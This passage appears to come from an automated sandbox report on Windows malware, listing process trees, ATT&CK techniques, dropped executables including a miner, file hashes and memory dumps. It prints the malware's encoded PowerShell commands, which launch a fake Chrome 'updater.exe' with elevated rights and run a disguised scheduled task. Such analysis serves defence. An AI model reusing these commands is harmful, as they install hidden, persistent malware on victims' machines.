AcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBzAGIAawBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBuAHQAcABhACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="
3⤵
PID:2708

C:\Users\Admin\AppData\Local\Temp\26F4.exe
C:\Users\Admin\AppData\Local\Temp\26F4.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4128

C:\Users\Admin\AppData\Local\Temp\3DF7.exe
C:\Users\Admin\AppData\Local\Temp\3DF7.exe
1⤵
- Executes dropped EXE
PID:5040

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
2⤵
PID:4112

C:\Users\Admin\AppData\Local\Temp\4376.exe
C:\Users\Admin\AppData\Local\Temp\4376.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1788

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
2⤵
PID:4752

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1112

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2268

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1368

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3864

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3348

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3692

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:436

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4076

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGYAdAAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAawBqAHkAIwA+AA=="
1⤵
PID:4944

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

File Permissions Modification

T1222

Scripting

T1064

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe
Filesize
836KB

MD5
edb6463d39eb1305c07400d169a40eba

SHA1
456f4da4c204f7dd77af1834275213f663128e11

SHA256
b0319fee29612b6f40ee9a9368cc23273c233547d9b1aa3bb551f8b57496ceb9

SHA512
ab03697252ef332f4c8373bc47e3584302b58d3b314cecf9f9f39b3bbc7b1771080671185c4d29d57b1cfcc605afe70132ece7667d638a64096853e6d7c72306

Download Submit
C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe
Filesize
836KB

MD5
edb6463d39eb1305c07400d169a40eba

SHA1
456f4da4c204f7dd77af1834275213f663128e11

SHA256
b0319fee29612b6f40ee9a9368cc23273c233547d9b1aa3bb551f8b57496ceb9

SHA512
ab03697252ef332f4c8373bc47e3584302b58d3b314cecf9f9f39b3bbc7b1771080671185c4d29d57b1cfcc605afe70132ece7667d638a64096853e6d7c72306

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
b651ea39a3e5964c6ea5a0d48e43d58c

SHA1
b8ff78fd4e72fc39c463ad719e4126df536a47ca

SHA256
e741956d4494bf972155abd4242ece41a5a9a04c57152a00ea3547568a57a54c

SHA512
e9fb70dcbcc21af1fda3fa452ecfac8a71ea1f11863a62c86f25e1d6a47c6c80f5a5c213df035e25459276d147a3e779aa02d418de306b47690af7aa8accb02e

Download Submit
C:\Users\Admin\AppData\Local\Temp\1176.exe
Filesize
1.1MB

MD5
ae30203171ea1b8be4017efcab8dd23e

SHA1
597c1cbc27659181318bd9d4f44fcd55abc4e36e

SHA256
a232ab45ccd355e5ba96a254edcc53deb2bcbf154610732b444cb5d6d07ce401

SHA512
b1a963f6b0953673145191540e22d9eee4039efccbb8bf153517ba63257a056000a15fd52edf4c6a2dd572cca5267d675a174694c694e408d9a006e4dc933f04

Download Submit
C:\Users\Admin\AppData\Local\Temp\1176.exe
Filesize
1.1MB

MD5
ae30203171ea1b8be4017efcab8dd23e

SHA1
597c1cbc27659181318bd9d4f44fcd55abc4e36e

SHA256
a232ab45ccd355e5ba96a254edcc53deb2bcbf154610732b444cb5d6d07ce401

SHA512
b1a963f6b0953673145191540e22d9eee4039efccbb8bf153517ba63257a056000a15fd52edf4c6a2dd572cca5267d675a174694c694e408d9a006e4dc933f04

Download Submit
C:\Users\Admin\AppData\Local\Temp\2126.exe
Filesize
2.6MB

MD5
b5d020046c84c4cc22ce979dce7b53bf

SHA1
a76f5ea5ab510492f4e322fece1e826c16955045

SHA256
6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28

SHA512
a834168b2e9475265b7f1b44d1606570119deaa0bd6bd5dbc36e9b7beb015393d03fecdad8e0fd15364c3fc004173f55a307e81623e651aab5c191fd3f929b2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\2126.exe
Filesize
2.6MB

MD5
b5d020046c84c4cc22ce979dce7b53bf

SHA1
a76f5ea5ab510492f4e322fece1e826c16955045

SHA256
6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28

SHA512
a834168b2e9475265b7f1b44d1606570119deaa0bd6bd5dbc36e9b7beb015393d03fecdad8e0fd15364c3fc004173f55a307e81623e651aab5c191fd3f929b2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\26F4.exe
Filesize
306KB

MD5
40a72a9a7759bddd4172d5bcd813bad1

SHA1
4b7d378869813c9f6901082afd16cf990c4825ce

SHA256
ebecacc7d09daa537584476607d7e0554a61a4d8e3792e051f02330042bb587f

SHA512
908a5557a69770a5cfde91e5e54b3cf27d498aa4a5c426b8cb9ec06202f1b87bf823354e54ab76688e90ddd3795445d6e7f21a9e25d8c629f9338a5b217c1ed9

Download Submit
C:\Users\Admin\AppData\Local\Temp\26F4.exe
Filesize
306KB

MD5
40a72a9a7759bddd4172d5bcd813bad1

SHA1
4b7d378869813c9f6901082afd16cf990c4825ce

SHA256
ebecacc7d09daa537584476607d7e0554a61a4d8e3792e051f02330042bb587f

SHA512
908a5557a69770a5cfde91e5e54b3cf27d498aa4a5c426b8cb9ec06202f1b87bf823354e54ab76688e90ddd3795445d6e7f21a9e25d8c629f9338a5b217c1ed9

Download Submit
C:\Users\Admin\AppData\Local\Temp\3DF7.exe
Filesize
3.0MB

MD5
72efc55b476245e5955a405c50c3574f

SHA1
82cc77bb5e47520209e6564513e45c7d39573115

SHA256
899d0f9e8343dab899e302fa6bda0ec1bc4133f00fbb6d9215eea4b79ccf4ecb

SHA512
01e2eec8c951815b0cd98904ad5758a6c7c73f8b3e4cb4fcaeb80d8cb4f68366d06b2a309b3349d2a22f8904ec815feaf33f7a599bf7d56b3ec38188071604b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\3DF7.exe
Filesize
3.0MB

MD5
72efc55b476245e5955a405c50c3574f

SHA1
82cc77bb5e47520209e6564513e45c7d39573115

SHA256
899d0f9e8343dab899e302fa6bda0ec1bc4133f00fbb6d9215eea4b79ccf4ecb

SHA512
01e2eec8c951815b0cd98904ad5758a6c7c73f8b3e4cb4fcaeb80d8cb4f68366d06b2a309b3349d2a22f8904ec815feaf33f7a599bf7d56b3ec38188071604b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\4376.exe
Filesize
219KB

MD5
b2afa95f8e375201008986ebf6b9fe86

SHA1
d98ec904978d887f28d0f37f6e4e0b71184987c6

SHA256
1ed76db0be44b6f6e16668ac8f5fb54640c59a89e0d5826e1894c2ae6b8596fa

SHA512
2f5772f139b85dc3adccb2a9b2844b36c1ddbf4645d15242e5ed93d815278152c7d0bfc58eb00498b40bfc99a104174b90c1e2bf92ee823cac13d29c5c4d9a78

Download Submit
C:\Users\Admin\AppData\Local\Temp\4376.exe
Filesize
219KB

MD5
b2afa95f8e375201008986ebf6b9fe86

SHA1
d98ec904978d887f28d0f37f6e4e0b71184987c6

SHA256
1ed76db0be44b6f6e16668ac8f5fb54640c59a89e0d5826e1894c2ae6b8596fa

SHA512
2f5772f139b85dc3adccb2a9b2844b36c1ddbf4645d15242e5ed93d815278152c7d0bfc58eb00498b40bfc99a104174b90c1e2bf92ee823cac13d29c5c4d9a78

Download Submit
C:\Users\Admin\AppData\Local\Temp\918.exe
Filesize
218KB

MD5
88ac1c2d9500309c4fdb3274f457c013

SHA1
2faffb7ea31e40dad5050d1d66fa1e3c87d123a4

SHA256
a6110b73589c1bd4aa3a13c6eca4ca9f72807d0954749ea9116ebead42c33ec0

SHA512
465e7f3c7b4667290e70767decbf1f55c2391a66a2f625cb348c81a5e2342579ed362bdc460b7c133b5717f3c33c5d4359b60c3a947706af87fc65ae063fc951

Download Submit
C:\Users\Admin\AppData\Local\Temp\918.exe
Filesize
218KB

MD5
88ac1c2d9500309c4fdb3274f457c013

SHA1
2faffb7ea31e40dad5050d1d66fa1e3c87d123a4

SHA256
a6110b73589c1bd4aa3a13c6eca4ca9f72807d0954749ea9116ebead42c33ec0

SHA512
465e7f3c7b4667290e70767decbf1f55c2391a66a2f625cb348c81a5e2342579ed362bdc460b7c133b5717f3c33c5d4359b60c3a947706af87fc65ae063fc951

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp154D.tmp.bat
Filesize
153B

MD5
5048a7335e1452d82f1eb3418db19b3e

SHA1
611a944d03dbaff66e66f67b3e155c33d35a0364

SHA256
4e9e9700ab05ae0e890ac06953584214c9f097a42c97a5dd703ac56e794e74db

SHA512
e5bd0147a7a090d10652be0d15156ca2bac97c21bcb8397f243178e9c2307d44b7166d4471bc8a6b1ff9b55f1810f17078f2d4f688604a5f9476c89292f12837

Download Submit
C:\Users\Admin\AppData\Roaming\EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe
Filesize
836KB

MD5
edb6463d39eb1305c07400d169a40eba

SHA1
456f4da4c204f7dd77af1834275213f663128e11

SHA256
b0319fee29612b6f40ee9a9368cc23273c233547d9b1aa3bb551f8b57496ceb9

SHA512
ab03697252ef332f4c8373bc47e3584302b58d3b314cecf9f9f39b3bbc7b1771080671185c4d29d57b1cfcc605afe70132ece7667d638a64096853e6d7c72306

Download Submit
C:\Users\Admin\AppData\Roaming\EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe
Filesize
836KB

MD5
edb6463d39eb1305c07400d169a40eba

SHA1
456f4da4c204f7dd77af1834275213f663128e11

SHA256
b0319fee29612b6f40ee9a9368cc23273c233547d9b1aa3bb551f8b57496ceb9

SHA512
ab03697252ef332f4c8373bc47e3584302b58d3b314cecf9f9f39b3bbc7b1771080671185c4d29d57b1cfcc605afe70132ece7667d638a64096853e6d7c72306

Download Submit
C:\Windows\Temp\miner2.exe
Filesize
2.5MB

MD5
b4e0599f4aa2a201d2321a93d34f30b2

SHA1
0747c2e020ca9d158c6733c839affd843fd97232

SHA256
f3e536e18d8fdde117a27d2051668ffca0dc7ccf29ae0fbcea53c04b39c72229

SHA512
2e47455e15644d2a00c636f8928d30eec8dc9ef8615305d2531b9adc3fe95f7b52e0caedb57a7c85868fcf87f1561b1e2110e34713ef171ae4f6508c279ec0ef

Download Submit
C:\Windows\Temp\miner2.exe
Filesize
2.5MB

MD5
b4e0599f4aa2a201d2321a93d34f30b2

SHA1
0747c2e020ca9d158c6733c839affd843fd97232

SHA256
f3e536e18d8fdde117a27d2051668ffca0dc7ccf29ae0fbcea53c04b39c72229

SHA512
2e47455e15644d2a00c636f8928d30eec8dc9ef8615305d2531b9adc3fe95f7b52e0caedb57a7c85868fcf87f1561b1e2110e34713ef171ae4f6508c279ec0ef

Download Submit
memory/328-155-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-143-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-120-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-145-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-132-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-146-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-147-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-148-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-149-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-150-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-151-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-152-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-153-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-154-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-141-0x0000000000400000-0x0000000000591000-memory.dmp

Filesize
1.6MB

Download
memory/328-156-0x00000000008F6000-0x0000000000907000-memory.dmp

Filesize
68KB

Download
memory/328-157-0x0000000000400000-0x0000000000591000-memory.dmp

Filesize
1.6MB

Download
memory/328-140-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-138-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-137-0x00000000008F6000-0x0000000000907000-memory.dmp

Filesize
68KB

Download
memory/328-136-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-121-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-122-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-123-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-124-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-135-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-125-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-134-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-133-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-139-0x00000000005A0000-0x00000000006EA000-memory.dmp

Filesize
1.3MB

Download
memory/328-144-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-126-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-142-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-131-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-127-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-128-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-130-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/328-129-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/416-1034-0x0000000000000000-mapping.dmp

Download
memory/436-743-0x0000000003140000-0x0000000003146000-memory.dmp

Filesize
24KB

Download
memory/436-829-0x0000000003140000-0x0000000003146000-memory.dmp

Filesize
24KB

Download
memory/436-746-0x0000000003130000-0x000000000313B000-memory.dmp

Filesize
44KB

Download
memory/436-491-0x0000000000000000-mapping.dmp

Download
memory/508-193-0x0000000000000000-mapping.dmp

Download
memory/600-865-0x0000000000000000-mapping.dmp

Download
memory/752-192-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/752-191-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/752-186-0x0000000000000000-mapping.dmp

Download
memory/752-189-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/752-243-0x0000000000A80000-0x0000000000D16000-memory.dmp

Filesize
2.6MB

Download
memory/752-199-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/752-209-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/752-203-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/752-207-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/752-188-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/752-196-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/752-268-0x0000000006950000-0x0000000006BE0000-memory.dmp

Filesize
2.6MB

Download
memory/752-190-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/752-200-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/752-197-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/752-201-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/752-204-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/1096-171-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/1096-162-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/1096-172-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/1096-1120-0x0000000000C20000-0x0000000000C59000-memory.dmp

Filesize
228KB

Download
memory/1096-167-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/1096-1097-0x0000000000C20000-0x0000000000C59000-memory.dmp

Filesize
228KB

Download
memory/1096-164-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/1096-173-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/1096-174-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/1096-158-0x0000000000000000-mapping.dmp

Download
memory/1096-168-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/1096-160-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/1096-161-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/1096-163-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/1096-169-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/1096-170-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/1096-165-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/1112-331-0x0000000000000000-mapping.dmp

Download
memory/1112-523-0x0000000003130000-0x000000000313B000-memory.dmp

Filesize
44KB

Download
memory/1112-476-0x0000000003140000-0x0000000003147000-memory.dmp

Filesize
28KB

Download
memory/1324-179-0x0000000000000000-mapping.dmp

Download
memory/1324-182-0x00000000004C0000-0x0000000000596000-memory.dmp

Filesize
856KB

Download
memory/1368-771-0x0000000000910000-0x0000000000915000-memory.dmp

Filesize
20KB

Download
memory/1368-574-0x0000000000910000-0x0000000000915000-memory.dmp

Filesize
20KB

Download
memory/1368-376-0x0000000000000000-mapping.dmp

Download
memory/1368-616-0x0000000000900000-0x0000000000909000-memory.dmp

Filesize
36KB

Download
memory/1444-1112-0x0000000000000000-mapping.dmp

Download
memory/1684-781-0x0000000000000000-mapping.dmp

Download
memory/1772-1307-0x0000000000000000-mapping.dmp

Download
memory/1788-322-0x0000000000000000-mapping.dmp

Download
memory/1872-869-0x0000000000000000-mapping.dmp

Download
memory/2268-352-0x0000000000000000-mapping.dmp

Download
memory/2268-362-0x0000000000970000-0x0000000000979000-memory.dmp

Filesize
36KB

Download
memory/2268-364-0x0000000000960000-0x000000000096F000-memory.dmp

Filesize
60KB

Download
memory/2268-737-0x0000000000970000-0x0000000000979000-memory.dmp

Filesize
36KB

Download
memory/2384-588-0x000001C5AF970000-0x000001C5AF9E6000-memory.dmp

Filesize
472KB

Download
memory/2384-439-0x000001C5977B0000-0x000001C5977D2000-memory.dmp

Filesize
136KB

Download
memory/2384-356-0x0000000000000000-mapping.dmp

Download
memory/2396-945-0x0000000000000000-mapping.dmp

Download
memory/2708-884-0x0000000000000000-mapping.dmp

Download
memory/2880-1055-0x0000000000000000-mapping.dmp

Download
memory/3080-883-0x0000000000000000-mapping.dmp

Download
memory/3348-700-0x0000000003130000-0x0000000003157000-memory.dmp

Filesize
156KB

Download
memory/3348-660-0x0000000003160000-0x0000000003182000-memory.dmp

Filesize
136KB

Download
memory/3348-425-0x0000000000000000-mapping.dmp

Download
memory/3376-1202-0x0000000000000000-mapping.dmp

Download
memory/3376-930-0x0000000000000000-mapping.dmp

Download
memory/3416-868-0x0000000000000000-mapping.dmp

Download
memory/3424-906-0x0000000000000000-mapping.dmp

Download
memory/3432-882-0x0000000000000000-mapping.dmp

Download
memory/3488-175-0x0000000000000000-mapping.dmp

Download
memory/3488-178-0x0000000000980000-0x0000000000AA0000-memory.dmp

Filesize
1.1MB

Download
memory/3692-704-0x00000000005B0000-0x00000000005B5000-memory.dmp

Filesize
20KB

Download
memory/3692-456-0x0000000000000000-mapping.dmp

Download
memory/3692-819-0x00000000005B0000-0x00000000005B5000-memory.dmp

Filesize
20KB

Download
memory/3692-740-0x00000000005A0000-0x00000000005A9000-memory.dmp

Filesize
36KB

Download
memory/3860-1093-0x00000000002921AE-mapping.dmp

Download
memory/3864-413-0x0000000001000000-0x000000000100C000-memory.dmp

Filesize
48KB

Download
memory/3864-762-0x0000000001010000-0x0000000001016000-memory.dmp

Filesize
24KB

Download
memory/3864-399-0x0000000000000000-mapping.dmp

Download
memory/3864-410-0x0000000001010000-0x0000000001016000-memory.dmp

Filesize
24KB

Download
memory/3868-980-0x0000000000000000-mapping.dmp

Download
memory/4060-1072-0x0000000000000000-mapping.dmp

Download
memory/4076-770-0x0000000000E30000-0x0000000000E37000-memory.dmp

Filesize
28KB

Download
memory/4076-527-0x0000000000000000-mapping.dmp

Download
memory/4076-563-0x0000000000E30000-0x0000000000E37000-memory.dmp

Filesize
28KB

Download
memory/4076-569-0x0000000000E20000-0x0000000000E2D000-memory.dmp

Filesize
52KB

Download
memory/4112-892-0x0000000000BE8EA0-mapping.dmp

Download
memory/4112-909-0x0000000000400000-0x0000000000BEB000-memory.dmp

Filesize
7.9MB

Download
memory/4112-920-0x0000000000400000-0x0000000000BEB000-memory.dmp

Filesize
7.9MB

Download
memory/4128-361-0x0000000004D00000-0x0000000004D12000-memory.dmp

Filesize
72KB

Download
memory/4128-355-0x0000000005240000-0x000000000534A000-memory.dmp

Filesize
1.0MB

Download
memory/4128-766-0x0000000008300000-0x00000000084C2000-memory.dmp

Filesize
1.8MB

Download
memory/4128-310-0x0000000004B40000-0x0000000004B7C000-memory.dmp

Filesize
240KB

Download
memory/4128-776-0x0000000000400000-0x00000000005A8000-memory.dmp

Filesize
1.7MB

Download
memory/4128-202-0x0000000000000000-mapping.dmp

Download
memory/4128-307-0x0000000004D40000-0x000000000523E000-memory.dmp

Filesize
5.0MB

Download
memory/4128-316-0x0000000004B80000-0x0000000004C12000-memory.dmp

Filesize
584KB

Download
memory/4128-208-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/4128-589-0x0000000005C40000-0x0000000005CA6000-memory.dmp

Filesize
408KB

Download
memory/4128-513-0x00000000005B0000-0x000000000065E000-memory.dmp

Filesize
696KB

Download
memory/4128-767-0x00000000084D0000-0x00000000089FC000-memory.dmp

Filesize
5.2MB

Download
memory/4128-210-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/4128-351-0x00000000053C0000-0x00000000059C6000-memory.dmp

Filesize
6.0MB

Download
memory/4128-368-0x0000000005350000-0x000000000538E000-memory.dmp

Filesize
248KB

Download
memory/4128-296-0x00000000024F0000-0x000000000252E000-memory.dmp

Filesize
248KB

Download
memory/4128-254-0x00000000005B0000-0x000000000065E000-memory.dmp

Filesize
696KB

Download
memory/4128-206-0x0000000077460000-0x00000000775EE000-memory.dmp

Filesize
1.6MB

Download
memory/4128-518-0x0000000000700000-0x000000000073E000-memory.dmp

Filesize
248KB

Download
memory/4128-278-0x0000000000400000-0x00000000005A8000-memory.dmp

Filesize
1.7MB

Download
memory/4128-373-0x0000000005AD0000-0x0000000005B1B000-memory.dmp

Filesize
300KB

Download
memory/4128-256-0x0000000000700000-0x000000000073E000-memory.dmp

Filesize
248KB

Download
memory/4140-893-0x0000000000000000-mapping.dmp

Download
memory/4208-919-0x0000000000000000-mapping.dmp

Download
memory/4208-214-0x0000000000000000-mapping.dmp

Download
memory/4224-1245-0x0000000000000000-mapping.dmp

Download
memory/4364-185-0x0000000000000000-mapping.dmp

Download
memory/4408-1360-0x0000000000000000-mapping.dmp

Download
memory/4528-924-0x0000000000000000-mapping.dmp

Download
memory/4596-183-0x0000000000000000-mapping.dmp

Download
memory/4716-946-0x0000000000000000-mapping.dmp

Download
memory/4732-1158-0x0000000000000000-mapping.dmp

Download
memory/4752-851-0x0000000009920000-0x000000000996B000-memory.dmp

Filesize
300KB

Download
memory/4752-825-0x0000000004FB0000-0x0000000004FD8000-memory.dmp

Filesize
160KB

Download
memory/4752-788-0x0000000004FD21CA-mapping.dmp

Download
memory/4784-917-0x0000000000000000-mapping.dmp

Download
memory/4808-782-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/4808-778-0x000000014006EE80-mapping.dmp

Download
memory/4808-867-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/4816-873-0x0000000000000000-mapping.dmp

Download
memory/4900-839-0x0000000000A80000-0x0000000000A88000-memory.dmp

Filesize
32KB

Download
memory/4900-564-0x0000000000000000-mapping.dmp

Download
memory/4900-758-0x0000000000A70000-0x0000000000A7B000-memory.dmp

Filesize
44KB

Download
memory/4900-757-0x0000000000A80000-0x0000000000A88000-memory.dmp

Filesize
32KB

Download
memory/4916-874-0x0000000000000000-mapping.dmp

Download
memory/4928-247-0x0000000000000000-mapping.dmp

Download
memory/4968-951-0x0000000000000000-mapping.dmp

Download
memory/4980-864-0x0000000000000000-mapping.dmp

Download
memory/5000-1284-0x0000000000000000-mapping.dmp

Download
memory/5040-299-0x0000000000000000-mapping.dmp

Download
memory/5052-309-0x0000000000000000-mapping.dmp

Download
memory/5052-314-0x0000000000390000-0x000000000061E000-memory.dmp

Filesize
2.6MB

Download
memory/5052-866-0x000000001C080000-0x000000001C092000-memory.dmp

Filesize
72KB

Download
memory/5108-1336-0x0000000000000000-mapping.dmp

Download